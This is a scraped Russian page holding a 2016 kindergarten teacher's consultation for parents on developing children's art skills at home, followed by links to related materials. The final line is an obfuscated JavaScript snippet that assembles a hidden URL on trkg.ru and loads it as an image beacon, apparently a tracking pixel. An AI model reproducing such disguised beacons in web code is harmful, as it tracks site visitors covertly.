«Развитие изобразительных умений детей в домашних условиях»
консультация (старшая группа) по теме

Прилепская Елена Александровна

Непосредственно образовательная деятельность  по ИЗО – деятельности, которая регулярно проводится в детском саду, является основой для приобретения ребенком художественного опыта. Родители должны стремиться обогащать опыт детей  новыми художественными впечатлениями, создавать в семье благоприятные условия для развития у ребенка  воображения, самостоятельности, проявлений творчества.

Скачать:

ВложениеРазмер
Microsoft Office document icon konsultatsiya_po_izo.doc28 КБ

Предварительный просмотр:

   

ГБОУ СОШ 962

ДО №4

Консультация для родителей:

«Развитие изобразительных умений детей в домашних условиях».

Подготовила:

Прилепская Е. А.

Москва , 2016

Непосредственно образовательная деятельность  по ИЗО – деятельности, которая регулярно проводится в детском саду, является основой для приобретения ребенком художественного опыта. Родители должны стремиться обогащать опыт детей  новыми художественными впечатлениями, создавать в семье благоприятные условия для развития у ребенка  воображения, самостоятельности, проявлений творчества.

      Но часто одного стремления бывает недостаточно: чтобы малыш мог дома рисовать, делать аппликацию, лепить, необходимо создавать условия для ИЗО – деятельности.

      Также нужно бережно относиться к первым поделкам из аппликации, лепке, рисункам, чтобы ребенок увидел это отношение.

      Обязательным является совместное творчество родителей и детей, а не предоставление ребенка самому себе.

       Детям недостаточно лишь дать лист бумаги, карандаш, комок пластилина. Надо помочь ему найти замысел и развить его.

В летнее время дети любят рисовать мелом на асфальте. Рисование мелками – это особый вид творчества. Для ребенка необходимо и увлекательно создавать рисунок не на листе бумаги, а на гладком сером асфальте. Родители также могут предложить рисовать палочкой на земле, снегу.

       Для непосредственно образовательной деятельности по ИЗО – деятельности у ребенка должно быть в комнате определенное, хорошо освещенное место, свет должен падать с левой стороны. В детском уголке можно повесить рисунки, поделки из аппликации, на полочку поставить поделку, выполненную совместно.

      Для того, чтобы начать творить ребенку потребуются различные художественные материалы (краски, бумага, карандаши, пластилин),  и определенное место где можно хранить все это богатство.

Хорошо оборудовать небольшой детский сектор, открытую полочку. Приучать ребенка нужно обязательно самостоятельно пользоваться материалами и убирать их на место.

Заниматься с  ребенком  желательно при дневном освещении, т.к. электрическое освещение препятствует наиболее полному восприятию материалов, с которыми ребенок работает.

     Таким образом, семья и детский сад осуществляет единый процесс всестороннего развития ребенка. Большое значение при этом отводится эстетическому воспитанию, различным видам художественной деятельности, формированию детского творчества.

           


По теме: методические разработки, презентации и конспекты

КОНСПЕКТ ПРАКТИКУМА Ознакомление родителей с игровыми приемами развития мелкой моторики детей в домашних условиях

Повышение педагогической компетентности родителей в вопросах развития речи детей в процессе игровой деятельности....

Мастер –класс для родителей «Овладение приемами развития артикуляционной моторики детей в домашних условиях и решение проблемы речевого развития детей дошкольного возраста».

Мастер –класс для родителей «Овладение приемами развития артикуляционной моторики детей в домашних условиях и решение проблемы речевого развития детей дошкольного возраста»....

Консультация для родителей «Развитие мелкой моторики детей в домашних условиях»

Игры и упражнения для развития мелкой моторики детей в домашних условиях...

28.04.2020 Развитие познавательной активности детей в домашних условиях

Лабиринт –это пространство,состоящее из запутанных путей к выходу (или путей,ведущих в тупик).Игра «Лабиринт» способствует развитию логического и пространственного мышления...

"Теоретические основы развития изобразительных умений детей старшего дошкольного возраста в сюжетном рисовании"

\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'fhka.trkg.ru\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!wi...